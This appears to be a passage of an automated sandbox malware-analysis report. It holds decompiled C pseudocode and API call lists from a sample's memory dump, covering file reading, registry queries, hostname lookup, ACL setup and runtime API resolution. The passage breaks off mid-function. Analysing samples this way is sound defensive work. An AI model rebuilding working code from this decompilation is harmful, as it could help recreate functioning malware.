    					E00392150(_t86, _t75);
    					_t61 =  *0x3b8628; // 0x593938
    					_t70 =  *((intOrPtr*)(_t61 + 0xac));
    					_v16 = 1;
    					 *_t70(0x3b8594);
    					E0039CB70(_t53, _t53, _t72);
    					L00391CB0();
    					 *_t72 = _t75;
    					_t47 =  *0x3b8628; // 0x593938
    					_t79 = _t79 + 0x10;
    					 *((intOrPtr*)( *((intOrPtr*)(_t47 + 0xc4))))(0x3b8594, _t53);
    					_t49 =  *_t72;
    					if(_t49 == 0) {
    						goto L13;
    					}
    					_t77 = 0;
    					if( *((intOrPtr*)(_t49 + 0x18)) <= 0) {
    						goto L13;
    					}
    					_t55 = __imp___time64;
    					do {
    						_t50 =  *_t55(0);
    						_t65 =  *((intOrPtr*)( *_t72 + 0x28));
    						 *((intOrPtr*)(_t65 + _t77 * 8)) = _t50;
    						 *((intOrPtr*)(_t65 + 4 + _t77 * 8)) = _t70;
    						_t70 =  *_t72;
    						_t77 = _t77 + 1;
    						_t79 = _t79 + 4;
    					} while (_t77 <  *((intOrPtr*)(_t70 + 0x18)));
    				}
    			}

    APIs
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • ??2@YAPAXI@Z.MSVCRT ref: 00392024
    • ??3@YAXPAX@Z.MSVCRT ref: 003920A1
    • _time64.MSVCRT ref: 003920D2
      • Part of subcall function 0039CB70: SysFreeString.OLEAUT32(?), ref: 0039CB81
    • ??3@YAXPAX@Z.MSVCRT ref: 003920F9
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00391050(void* __ecx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
    				long _v8;
    				long _v12;
    				void* __edi;
    				void* _t20;
    				int _t30;
    				void* _t33;
    				void* _t34;
    				intOrPtr _t37;
    				void* _t49;
    				void* _t50;
    				void* _t51;
    
    				_t49 = 0;
    				_t34 = __ecx;
    				_v8 = 0;
    				_v12 = 0;
    				_t20 = CreateFileW(_a8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
    				_t50 = _t20;
    				if(_t50 != 0xffffffff) {
    					_v8 = SetFilePointer(_t50, 0, 0, 2);
    					SetFilePointer(_t50, 0, 0, 0); // executed
    					_t49 = E003A1D90(_v8, 0);
    					_t51 = _t51 + 8;
    					if(_t49 != 0) {
    						_t30 = ReadFile(_t50, _t49, _v8,  &_v8, 0); // executed
    						if(_t30 != 0) {
    							_t33 = E003968A0(_t34, _t49, _a4, _t49, _v8, _a12, _a16); // executed
    							if(_t33 != 0) {
    								_v12 = 1;
    							}
    						}
    					}
    				}
    				if(_t50 != 0) {
    					_t37 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t37 + 0xf8))))(_t50);
    				}
    				if(_t49 != 0) {
    					E0039BB40(_t49);
    				}
    				return _v12;
    			}

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?), ref: 00391083
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0039109C
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 003910B1
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 003910DE
      • Part of subcall function 003968A0: memcpy.MSVCRT ref: 00396998
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00393C70(void* __ecx, WCHAR* _a4, void** _a8, long* _a12) {
    				long _v8;
    				void* _t17;
    				int _t29;
    				long _t32;
    				intOrPtr _t43;
    				void* _t46;
    				void* _t49;
    
    				_t32 = 0;
    				_v8 = 0;
    				_t49 = 0; // executed
    				_t17 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
    				_t46 = _t17;
    				if(_t46 != 0xffffffff) {
    					_v8 = SetFilePointer(_t46, 0, 0, 2);
    					SetFilePointer(_t46, 0, 0, 0); // executed
    					_t24 = _v8;
    					if(_v8 != 0) {
    						_t49 = E003A1D90(_t24, 0);
    						if(_t49 != 0) {
    							_t29 = ReadFile(_t46, _t49, _v8,  &_v8, 0); // executed
    							if(_t29 != 0) {
    								goto L2;
    							} else {
    								E0039BB40(_t49);
    								_t49 = 0;
    								_v8 = 0;
    							}
    						}
    					} else {
    						L2:
    						_t32 = 1;
    					}
    					_t43 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xf8))))(_t46);
    				}
    				 *_a8 = _t49;
    				 *_a12 = _v8;
    				return _t32;
    			}

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,003A14F1,?,00391BCA,?), ref: 00393C9E
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CBB
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CD0
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00393D08
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E0039CEA0(void* _a4, short* _a8) {
    				long _t16;
    				long _t21;
    				void* _t24;
    				intOrPtr _t28;
    				void* _t34;
    				short* _t36;
    
    				_t34 = _a4;
    				if(_t34 != 0) {
    					_t36 = _a8;
    					if(_t36 == 0 || lstrlenW(_t36) == 0) {
    						return 0;
    					} else {
    						RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4);
    						_t16 = RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4); // executed
    						if(_t16 == 2) {
    							L7:
    							_t24 = 0;
    						} else {
    							_t21 = RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4); // executed
    							if(_t21 != 0) {
    								goto L7;
    							} else {
    								_t24 = 1;
    							}
    						}
    						_t28 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x198))))(_a4);
    						return _t24;
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • lstrlenW.KERNEL32(?,?,?,?,003997FA,?,?), ref: 0039CEBD
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CEE1
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CEFC
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CF1C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 91%
    			E00398880(void* __ebx, void* __ecx, void* __edi, void* __esi) {
    				int _v8;
    				int _v12;
    				intOrPtr* _v16;
    				char _v20;
    				int _v24;
    				char _v28;
    				char _v32;
    				int _v36;
    				void* _v40;
    				int _v44;
    				int _v48;
    				int _v52;
    				int _v56;
    				char _v60;
    				int _v64;
    				int _v68;
    				char _v268;
    				char _v468;
    				void _v596;
    				char _v984;
    				void _v2008;
    				intOrPtr _t167;
    				intOrPtr _t168;
    				int _t169;
    				void* _t173;
    				intOrPtr _t186;
    				intOrPtr _t188;
    				signed int* _t191;
    				signed int* _t196;
    				signed int* _t198;
    				intOrPtr _t202;
    				intOrPtr _t206;
    				signed int* _t207;
    				signed int* _t208;
    				signed int* _t209;
    				signed int* _t211;
    				signed int* _t217;
    				signed int* _t218;
    				signed int* _t220;
    				int _t224;
    				signed int* _t228;
    				int _t233;
    				int _t237;
    				signed int* _t239;
    				signed int* _t240;
    				signed int* _t241;
    				signed int* _t247;
    				signed int* _t250;
    				signed int* _t252;
    				signed int* _t253;
    				signed int* _t259;
    				signed int* _t260;
    				intOrPtr _t261;
    				signed int** _t266;
    				void* _t271;
    				intOrPtr* _t282;
    				intOrPtr _t285;
    				signed int* _t292;
    				signed int* _t316;
    				signed int _t319;
    				intOrPtr* _t331;
    				signed int* _t335;
    				signed int* _t359;
    				intOrPtr _t367;
    				signed int* _t369;
    				intOrPtr _t378;
    				signed int _t383;
    				signed int* _t386;
    				signed int* _t387;
    				void* _t388;
    				void* _t389;
    				void* _t390;
    				void* _t392;
    				void* _t394;
    				void* _t395;
    
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_t271 = __ecx;
    				_v12 = 0;
    				_v16 = 0;
    				_v40 = 0;
    				_v8 = 0;
    				_v36 = 0;
    				_v56 = 0;
    				_v32 = 0;
    				_v60 = 0;
    				_v20 = 0;
    				_v68 = 0;
    				_v28 = 0;
    				_v44 = 0;
    				_v64 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				memset( &_v596, 0, 0x80);
    				memset( &_v2008, 0, 0x400);
    				_t167 =  *((intOrPtr*)(_t271 + 0x54));
    				_t389 = _t388 + 0x18;
    				 *(_t271 + 0x4ec) = 0;
    				 *(_t271 + 0x38) = 1;
    				_t396 = _t167;
    				if(_t167 != 0) {
    					_t168 = E00397B80(_t167, 0x3b3314,  &_v40, 0xffffffff);
    					_t23 = _t168 - 2; // -2
    					_t389 = _t389 + 0x10;
    					_v68 = _t168;
    					__eflags = _t23 - 1;
    					if(__eflags > 0) {
    						_push(0x36);
    						goto L84;
    					}
    					_t282 = _v40;
    					_t385 =  *((intOrPtr*)(_t282 + 4));
    					_v12 =  *_t282;
    					_v16 =  *((intOrPtr*)(_t282 + 4));
    					__eflags = _t168 - 3;
    					if(_t168 != 3) {
    						L12:
    						_t191 = E00397E20(_t385, 0,  &_v60, 0xffffffff);
    						_t389 = _t389 + 0x10;
    						__eflags = _t191;
    						if(__eflags != 0) {
    							_t386 = E0039CA00( *((intOrPtr*)(_t271 + 4)), __eflags, _v12);
    							E00399090(__eflags,  &_v268, 0x39);
    							_t285 =  *0x3b8628; // 0x593938
    							_t394 = _t389 + 8;
    							_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t285 + 0xe0))))(_v16,  &_v268);
    							__eflags = _t196;
    							if(_t196 != 0) {
    								L25:
    								__eflags = _t386;
    								if(__eflags != 0) {
    									L34:
    									_t198 = E00397E20(_t386[4], 0,  &_v32, 0xffffffff);
    									_t389 = _t394 + 0x10;
    									__eflags = _t198;
    									if(__eflags != 0) {
    										__eflags = E0039A270(_t271,  *((intOrPtr*)(_t271 + 4)), 0, _t386, _t386,  &_v984);
    										if(__eflags != 0) {
    											E00399090(__eflags,  &_v268, 0x39);
    											_t202 =  *0x3b8628; // 0x593938
    											_t390 = _t389 + 8;
    											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xe0))))(_v16,  &_v268);
    											if(__eflags != 0) {
    												E00399090(__eflags,  &_v268, 0x3e);
    												_t206 =  *0x3b8628; // 0x593938
    												_t389 = _t390 + 8;
    												_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t206 + 0xe0))))(_v16,  &_v268);
    												_t292 = _t386;
    												__eflags = _t207;
    												if(_t207 != 0) {
    													_t208 = E0039CB60(_t292);
    													__eflags = _t208;
    													if(_t208 == 0) {
    														L69:
    														_t209 = E0039F050(_t386);
    														__eflags = _t209;
    														if(_t209 == 0) {
    															E003967E0(_t386);
    														}
    														_t211 = E00397070(_t386,  &_v468);
    														__eflags = _t211;
    														if(_t211 != 0) {
    															_push(0);
    															_push(0);
    															_push(0);
    															__eflags = E00391CC0(_t386, _v32, _v20, _v28,  &_v2008,  &_v984);
    															if(__eflags != 0) {
    																L75:
    																_push(0);
    																_t217 = E003A0500(_t386, 0, _t386[0x10], _v60, _v20, _v28,  &_v2008,  &_v36,  &_v44,  &_v596); // executed
    																__eflags = _t217;
    																if(__eflags != 0) {
    																	_t218 =  *(_t271 + 0x64);
    																	__eflags = _t218;
    																	if(_t218 != 0) {
    																		E0039BB40(_t218);
    																		_t389 = _t389 + 4;
    																		 *(_t271 + 0x64) = 0;
    																	}
    																	_t220 = E003A1D90(_v44, 0);
    																	_t395 = _t389 + 8;
    																	_v56 = _t220;
    																	__eflags = _t220;
    																	if(__eflags != 0) {
    																		memcpy(_v56, _v36, _v44);
    																		_t390 = _t395 + 0xc;
    																		E00397AF0(_t271, _t386, _v36); // executed
    																		L82:
    																		 *(_t271 + 0x4ec) = 1;
    																		_v64 = 1;
    																	} else {
    																		_t224 = E00391C70(__eflags, 0x37);
    																		_t390 = _t395 + 4;
    																		_v8 = _t224;
    																		E00397AF0(_t271, _t386, _v36);
    																	}
    																	goto L86;
    																}
    																_push(0x42);
    																goto L84;
    															}
    															_push(0x3d);
    															goto L84;
    														} else {
    															_t169 = E003966C0( &_v468);
    															goto L85;
    														}
    													}
    													_t228 = E0039F050(_t386);
    													__eflags = _t228;
    													if(_t228 != 0) {
    														goto L75;
    													}
    													goto L69;
    												}
    												__eflags = E0039CB60(_t292);
    												if(__eflags != 0) {
    													__eflags = E0039F050(_t386);
    													if(__eflags != 0) {
    														E00391680(_t386, _t386[0x10]);
    														E00393040( *((intOrPtr*)(_t271 + 4)), __eflags, _v12);
    														goto L82;
    													}
    													_t233 = E00391C70(__eflags, 0x3f);
    													_t390 = _t389 + 4;
    													_v8 = _t233;
    													E003967E0(_t386);
    													E00393040( *((intOrPtr*)(_t271 + 4)), __eflags, _v12);
    													goto L86;
    												}
    												_t237 = E00391C70(__eflags, 0x43);
    												_t390 = _t389 + 4;
    												_v8 = _t237;
    												E00393040( *((intOrPtr*)(_t271 + 4)), __eflags, _v12);
    												goto L86;
    											}
    											_t239 = E0039CB60(_t386);
    											_t316 = _t386;
    											__eflags = _t239;
    											if(_t239 != 0) {
    												_t240 = E0039F050(_t316);
    												__eflags = _t240;
    												if(_t240 != 0) {
    													__eflags = _v48;
    													if(_v48 != 0) {
    														_t241 = E003A1D90(0x400, 0);
    														_t390 = _t390 + 8;
    														_v8 = _t241;
    														_t387 = 0x200;
    														_v24 = 0;
    														_t359 = _v12 - _t241;
    														__eflags = _t359;
    														while(1) {
    															_t86 =  &(_t387[0x1fffff7f]); // 0x7ffffffe
    															__eflags = _t86;
    															if(_t86 == 0) {
    																break;
    															}
    															_t319 =  *(_t359 + _t241) & 0x0000ffff;
    															__eflags = _t319;
    															if(_t319 == 0) {
    																break;
    															}
    															 *_t241 = _t319;
    															_t241 =  &(_t241[0]);
    															_t387 = _t387 - 1;
    															__eflags = _t387;
    															if(_t387 != 0) {
    																continue;
    															}
    															L58:
    															_t241 = _t241 - 2;
    															__eflags = _t241;
    															_v24 = 0x8007007a;
    															L59:
    															 *_t241 = 0;
    															__eflags = _v24;
    															if(__eflags >= 0) {
    																E00399090(__eflags,  &_v268, 0xc5);
    																_t390 = _t390 + 8;
    																E003A1C50(_v8, 0x200,  &_v268);
    															}
    															goto L86;
    														}
    														__eflags = _t387;
    														if(_t387 != 0) {
    															goto L59;
    														}
    														goto L58;
    													}
    													E003967E0(_t386);
    													_t247 = E00397070(_t386,  &_v468);
    													__eflags = _t247;
    													if(_t247 != 0) {
    														L50:
    														_push(0);
    														_push(0);
    														_push(0);
    														_t250 = E00391CC0(_t386, _v32, _v20, _v28,  &_v2008,  &_v984); // executed
    														__eflags = _t250;
    														if(__eflags != 0) {
    															goto L82;
    														}
    														_push(0x3d);
    														goto L84;
    													}
    													_t169 = E003966C0( &_v468);
    													goto L85;
    												}
    												__eflags = _t386[0xb];
    												if(__eflags == 0) {
    													E003967E0(_t386);
    													_t252 = E00397070(_t386,  &_v468);
    													__eflags = _t252;
    													if(_t252 != 0) {
    														goto L50;
    													}
    													_t169 = E003966C0( &_v468);
    													goto L85;
    												}
    												_push(0x3c);
    												goto L84;
    											}
    											_t253 = E00397070(_t316,  &_v468); // executed
    											__eflags = _t253;
    											if(_t253 != 0) {
    												goto L50;
    											}
    											_t169 = E003966C0( &_v468);
    											goto L85;
    										}
    										_push(0x3b);
    										goto L84;
    									}
    									_push(0x37);
    									goto L84;
    								}
    								L26:
    								E00399090(__eflags,  &_v268, 0x3e);
    								_t367 =  *0x3b8628; // 0x593938
    								_t394 = _t394 + 8;
    								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t367 + 0xe0))))(_v16,  &_v268);
    								if(__eflags != 0) {
    									_t259 = 0;
    									__eflags = _v52;
    									if(__eflags != 0) {
    										_t259 = 1;
    									}
    									_v24 = 0;
    									_t260 = E00398F40( *((intOrPtr*)(_t271 + 4)), _v12, __eflags, _v12, _t259,  &_v24); // executed
    									_t386 = _t260;
    									__eflags = _t386;
    									if(_t386 != 0) {
    										goto L34;
    									} else {
    										__eflags = _v24 - 1;
    										if(__eflags == 0) {
    											 *(_t271 + 0x38) = 4;
    										}
    										_push(0x3a);
    										goto L84;
    									}
    								}
    								_push(0x43);
    								goto L84;
    							}
    							_t331 = _v16;
    							_t261 =  *_t331;
    							__eflags = _t261 - 0x540073;
    							if(_t261 != 0x540073) {
    								L18:
    								__eflags = _t261 - 0x740073;
    								if(_t261 == 0x740073) {
    									__eflags =  *((intOrPtr*)(_t331 + 4)) - 0x720041;
    									if( *((intOrPtr*)(_t331 + 4)) == 0x720041) {
    										_v48 = 1;
    									}
    								}
    								L21:
    								__eflags = _t386;
    								if(__eflags == 0) {
    									goto L26;
    								}
    								__eflags = _v48;
    								if(_v48 != 0) {
    									goto L25;
    								}
    								__eflags = _v52;
    								if(_v52 != 0) {
    									goto L25;
    								}
    								E00391680(_t386, _t386[0x10]);
    								E00393040( *((intOrPtr*)(_t271 + 4)), __eflags, _v12);
    								goto L26;
    							}
    							__eflags =  *((intOrPtr*)(_t331 + 4)) - 0x720061;
    							if( *((intOrPtr*)(_t331 + 4)) != 0x720061) {
    								goto L18;
    							}
    							_v48 = 1;
    							_v52 = 1;
    							goto L21;
    						}
    						L13:
    						_push(0x37);
    						goto L84;
    					}
    					_t369 =  *(_t282 + 8);
    					__eflags = _t369;
    					if(__eflags == 0) {
    						goto L13;
    					} else {
    						_t335 = 0x7fffffff;
    						_t266 = _t369;
    						while(1) {
    							__eflags =  *_t266;
    							if( *_t266 == 0) {
    								break;
    							}
    							_t266 =  &(_t266[0]);
    							_t335 = _t335 - 1;
    							__eflags = _t335;
    							if(__eflags != 0) {
    								continue;
    							}
    							_push(0x37);
    							goto L84;
    						}
    						__eflags = _t335;
    						if(__eflags == 0) {
    							goto L13;
    						}
    						__eflags = E0039BA40(_t271 + 0x4f4, _t369, 0x7fffffff - _t335,  &_v20,  &_v28);
    						if(__eflags != 0) {
    							goto L12;
    						}
    						_push(0x38);
    						goto L84;
    					}
    				} else {
    					 *(_t271 + 0x38) = 2;
    					_push(0x35);
    					L84:
    					_t169 = E00391C70(_t396);
    					L85:
    					_t390 = _t389 + 4;
    					_v8 = _t169;
    					L86:
    					 *(_t271 + 0x4f0) = _v8;
    					 *(_t271 + 0x64) = memcpy(_t271 + 0x6c,  &_v596, 0x20 << 2);
    					 *(_t271 + 0x68) = _v44;
    					_t173 = memcpy(_t271 + 0xec,  &_v2008, 0x100 << 2);
    					_t392 = _t390 + 0x18;
    					if(_t173 != 0) {
    						E0039BB40(_t173);
    						_t392 = _t392 + 4;
    					}
    					_t174 =  *((intOrPtr*)(_t271 + 0x60));
    					if( *((intOrPtr*)(_t271 + 0x60)) != 0) {
    						E0039BB40(_t174);
    						_t392 = _t392 + 4;
    					}
    					if(_v12 == 0) {
    						 *((intOrPtr*)(_t271 + 0x5c)) = 0;
    					} else {
    						_t188 = E003966C0(_v12);
    						_t392 = _t392 + 4;
    						 *((intOrPtr*)(_t271 + 0x5c)) = _t188;
    					}
    					_t175 = _v16;
    					_t383 = 0;
    					if(_v16 == 0) {
    						 *((intOrPtr*)(_t271 + 0x60)) = 0;
    					} else {
    						_t186 = E003966C0(_t175);
    						_t392 = _t392 + 4;
    						 *((intOrPtr*)(_t271 + 0x60)) = _t186;
    					}
    					_t378 = _v68;
    					if(_t378 <= 0) {
    						L99:
    						_t176 = _v60;
    						if(_v60 != 0) {
    							E0039BB40(_t176);
    							_t392 = _t392 + 4;
    						}
    						_t177 = _v32;
    						if(_v32 != 0) {
    							E0039BB40(_t177);
    							_t392 = _t392 + 4;
    						}
    						_t178 = _v40;
    						if(_v40 != 0) {
    							E0039BB40(_t178);
    							_t392 = _t392 + 4;
    						}
    						_t179 = _v20;
    						if(_v20 != 0) {
    							E0039BB40(_t179);
    						}
    						return _v64;
    					} else {
    						do {
    							E0039BB40( *((intOrPtr*)(_v40 + _t383 * 4)));
    							_t383 = 1 + _t383;
    							_t392 = _t392 + 4;
    						} while (_t383 < _t378);
    						goto L99;
    					}
    				}
    			}

    APIs
    • memset.MSVCRT ref: 003988CA
    • memset.MSVCRT ref: 003988DC
      • Part of subcall function 00398F40: ??3@YAXPAX@Z.MSVCRT ref: 00398FEF
      • Part of subcall function 0039A270: memset.MSVCRT ref: 0039A2A2
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memcpy.MSVCRT ref: 00398E15
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 003A12E2
    • gethostname.WS2_32(?,000000FF), ref: 003A1302
    • getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 003A1322
    • freeaddrinfo.WS2_32(00000000), ref: 003A1380
    • WSACleanup.WS2_32 ref: 003A1386
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 62%
    			E003980A0(intOrPtr _a4, intOrPtr _a8) {
    				char _v8;
    				char _v12;
    				char _v16;
    				void* _v20;
    				short _v24;
    				char _v28;
    				short _v32;
    				char _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				int _v48;
    				int _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				intOrPtr _v76;
    				int _v80;
    				int _v92;
    				intOrPtr _v96;
    				void _v100;
    				intOrPtr _t63;
    				intOrPtr _t64;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				intOrPtr _t71;
    				intOrPtr _t74;
    				void* _t82;
    				intOrPtr _t83;
    				intOrPtr _t94;
    				intOrPtr _t98;
    				intOrPtr _t100;
    				intOrPtr _t104;
    				intOrPtr _t109;
    				intOrPtr _t113;
    				intOrPtr _t114;
    				intOrPtr _t116;
    				intOrPtr _t122;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t113 =  *0x3b8628; // 0x593938
    				_push( &_v20);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(1);
    				_v16 = 0;
    				_v8 = 0;
    				_v20 = 0;
    				_v12 = 0;
    				_v28 = 0;
    				_v24 = 0x100;
    				_v36 = 0;
    				_v32 = 0x500;
    				_push( &_v28);
    				if( *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x158))))() == 0) {
    					L11:
    					_t114 =  *0x3b8628; // 0x593938
    					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x30))))();
    				} else {
    					_t74 =  *0x3b8628; // 0x593938
    					_push( &_v8);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0x220);
    					_push(0x20);
    					_push(2);
    					_push( &_v36);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t74 + 0x158))))() == 0) {
    						goto L11;
    					} else {
    						memset( &_v100, 0, 0x40);
    						_v72 = _v20;
    						_v40 = _v8;
    						_t104 =  *0x3b8628; // 0x593938
    						_v100 = 0x80000000;
    						_v96 = 2;
    						_v92 = 0;
    						_v80 = 0;
    						_v76 = 5;
    						_v68 = 0x10000000;
    						_v64 = 2;
    						_v60 = 0;
    						_v48 = 0;
    						_v44 = 2;
    						_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x1b0))))(2,  &_v100, 0,  &_v12);
    						if(_t128 != 0) {
    							L10:
    							if(_t128 == 0xffffffff) {
    								goto L11;
    							}
    						} else {
    							_t127 = _a8;
    							_t122 =  *0x3b8628; // 0x593938
    							_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x1a8))))(_a4, _t127, 4, 0, 0, _v12, 0); // executed
    							_t128 = _t82;
    							if(_t128 == 0 || _t128 != 5) {
